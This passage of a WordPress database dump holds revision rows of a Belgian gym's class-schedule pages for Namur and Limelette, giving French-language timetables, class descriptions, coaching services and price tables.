class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 09:03:02', '2013-11-03 09:03:02', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(399, 1, '2013-11-03 09:03:19', '2013-11-03 09:03:19', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1>Namur</h1>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h1><a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a></h1>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:03:19', '2013-11-03 09:03:19', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(400, 1, '2013-11-03 09:04:16', '2013-11-03 09:04:16', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h2>Namur</h2>\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n<h2><a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a></h2>\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:04:16', '2013-11-03 09:04:16', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(401, 1, '2013-11-03 09:05:19', '2013-11-03 09:05:19', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%; background-color: #ffffff;\">\n<div class=\"arrondi\">\n<div align=\"center\">\n\nNamur\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n<div align=\"center\">\n\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<h2>Team Training :</h2>\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\n\n&nbsp;\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<td class=\"ttitreh\">LUNDI</td>\n<td class=\"ttitreh\">MARDI</td>\n<td class=\"ttitreh\">MERCREDI</td>\n<td class=\"ttitreh\">JEUDI</td>\n<td class=\"ttitreh\">VENDREDI</td>\n<td class=\"ttitreh\">SAMEDI</td>\n<td class=\"ttitreh\">DIMANCHE</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"ttrx\"><b>18h</b>\nTRX</td>\n<td class=\"tcardio\"><b>17h30</b>\nCARDIO</td>\n<td class=\"trip\"><b>18h</b>\nRIP-KETTLE</td>\n<td class=\"tglfe\"><b>17h30</b>\nGLFE</td>\n<td class=\"ttrx\"><b>17h30</b>\nTRX</td>\n<td class=\"ttrx\"><b>11h</b>\nTRX</td>\n<td class=\"tglfe\"><b>11h</b>\nGLFE</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tglfe\"><b>18h30</b>\nGLFE</td>\n<td class=\"ttrx\"><b>18h15</b>\nTRX</td>\n<td class=\"tcardio\"><b>18h30</b>\nCARDIO</td>\n<td class=\"trip\"><b>18h15</b>\nRIP-KETTLE</td>\n<td class=\"tglfe\"><b>18h15</b>\nGLFE</td>\n<td class=\"tglfe\"><b>11h30</b>\nGLFE</td>\n<td class=\"ttrx\"><b>11h30</b>\nTRX</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"trip\"><b>19h</b>\nRIP-KETTLE</td>\n<td class=\"tglfe\"><b>19h</b>\nGLFE</td>\n<td class=\"ttrx\"><b>19h</b>\nTRX</td>\n<td class=\"tcardio\"><b>19h</b>\nCARDIO</td>\n<td class=\"trip\"><b>19h</b>\nRIP-KETTLE</td>\n<td class=\"trip\"><b>12h</b>\nRIP-KETTLE</td>\n<td class=\"tcardio\"><b>12h</b>\nCARDIO</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"tcardio\"><b>19h45</b>\nCARDIO</td>\n<td class=\"trip\"><b>19h30</b>\nRIP-KETTLE</td>\n<td class=\"tglfe\"><b>19h45</b>\nGLFE</td>\n<td class=\"ttrx\"><b>19h15</b>\nTRX</td>\n<td class=\"tcardio\"><b>19h45</b>\nCARDIO</td>\n<td class=\"tcellule\"></td>\n<td class=\"tcellule\"></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\n\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\n\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\n\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\n<h2></h2>\n<h2>Duo Training :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h2></h2>\n<h2>Personal Training :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h2></h2>\n<h2>Coaching nutritionnel :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h2></h2>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Team Training</td>\n<td class=\"tcelluleprix\">1 séance : 9.00€\n1 carte de 10 séances : 80.00€ (valable 3 mois)\n1 carte de 20 séances : 120.00€ (valable 4 mois)\nAbonnement 6 mois illimité : 399.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-autosave-v1', '', '', '2013-11-03 09:05:19', '2013-11-03 09:05:19', '', 11, 'http://www2.crosstrainingcenter.be/11-autosave-v1/', 0, 'revision', '', 0),
(403, 1, '2013-11-03 09:06:09', '2013-11-03 09:06:09', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi_hover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 09:06:09', '2013-11-03 09:06:09', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(402, 1, '2013-11-03 09:05:29', '2013-11-03 09:05:29', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; background-color: #efefef;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td 